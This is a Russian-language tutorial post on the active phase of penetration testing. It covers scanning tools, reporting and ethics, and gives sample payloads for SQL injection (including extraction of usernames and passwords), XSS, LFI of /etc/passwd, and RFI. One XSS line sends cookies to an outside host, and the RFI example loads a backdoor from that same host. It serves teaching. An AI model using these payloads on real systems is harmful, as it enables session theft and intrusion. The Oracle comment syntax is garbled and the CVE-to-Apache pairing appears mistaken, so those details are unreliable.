💥Активная фаза: выявление уязвимостей
После сбора данных начинается поиск уязвимостей. Используемые инструменты зависят от типа системы.
OWASP ZAP — инструмент для автоматического тестирования веб-приложений. Он выявляет уязвимости, такие как XSS (межсайтовый скриптинг), SQL-инъекции и некорректные заголовки безопасности.
Burp Suite — инструмент для ручного анализа. Позволяет перехватывать HTTP-запросы, модифицировать их, тестировать управление сессиями и логику приложения. Подходит для сложных систем.
Nikto — сканер веб-серверов. Проверяет устаревшее ПО, открытые административные панели, некорректные настройки, такие как отсутствие заголовков безопасности.
Автоматизированные инструменты ограничены известными шаблонами уязвимостей. Ручной анализ необходим для выявления нестандартных проблем: ошибок в обработке данных, слабых механизмов авторизации или уязвимостей в логике приложения.
❗️Уязвимости: примеры и тесты
SQL-инъекция — атака на базы данных через некорректную обработку пользовательского ввода.
Ввод
' OR 1=1 --
проверяет возможность обхода авторизации, добавляя условие, всегда возвращающее истинный результат. Комментарий
--
отключает остальную часть запроса.
Для СУБД Oracle используется
/ /
. Для извлечения данных:
' UNION SELECT username, password FROM users --
, где
UNION
объединяет результат с основным запросом. Число колонок в
UNION
должно совпадать с числом колонок в исходном запросе.
XSS (межсайтовый скриптинг) — внедрение вредоносного кода в веб-страницу.
Тест
<script>alert('XSS')</script>
проверяет, выполняется ли код в браузере.
Если срабатывает, возможна кража сессий через
<script>fetch('https://x.logsheets.net/cookie?' + document.cookie)</script>
, отправляющее cookie на внешний сервер, или перенаправление пользователей.
LFI (Local File Inclusion) — доступ к локальным файлам сервера.
Запрос
?file=../../../../etc/passwd
пытается извлечь системный файл
/etc/passwd
. Успех возможен при отсутствии ограничений, таких как настройка
open_basedir
.
RFI (Remote File Inclusion) — включение внешнего файла. Запрос
?template=https://x.logsheets.net/backdoor.txt
загружает вредный код, если настройка
allow_url_include
активна. Это редкость, но встречается в тестовых средах.
Каждая уязвимость подтверждается доказательствами: командами, логами, скриншотами.
Например, SQL-инъекция должна показать извлечённые данные, XSS — перехваченные cookie.
🤫Этика: соблюдение границ
Пентест проводится строго в рамках договора с заказчиком. Все действия документируются и воспроизводимы.
Эксплуатация уязвимостей служит только для оценки риска, а не для нанесения вреда. Нарушение границ делает тестирование незаконным.
🪧Отчёт: результат тестирования
Отчёт фиксирует процесс и результаты: какие системы тестировались, какие методы применялись, какие уязвимости обнаружены, как их воспроизвести, как устранить.
Рекомендации конкретны: не «обновите ПО», а «установите Apache 2.4.58 для устранения CVE-2023-5043». Логи, скриншоты и команды подтверждают выводы.
CVSS (Common Vulnerability Scoring System) — система оценки рисков. Оценка 9.8 указывает на уязвимость, позволяющую удалённый доступ без авторизации.
Оценка 4.3 — на локальную проблему с ограниченным воздействием. Это помогает расставить приоритеты.
☠️ Итог: защита через тестирование
Пентест элемент системы безопасности. Уязвимости ищут постоянно, и цель — обнаружить их первыми.
🤔 Тщательная подготовка, методичный подход и практика повышают защищённость систем.
#пентест #кибербезопасность #инфобез #безопасностьсети #уязвимости #этика #IT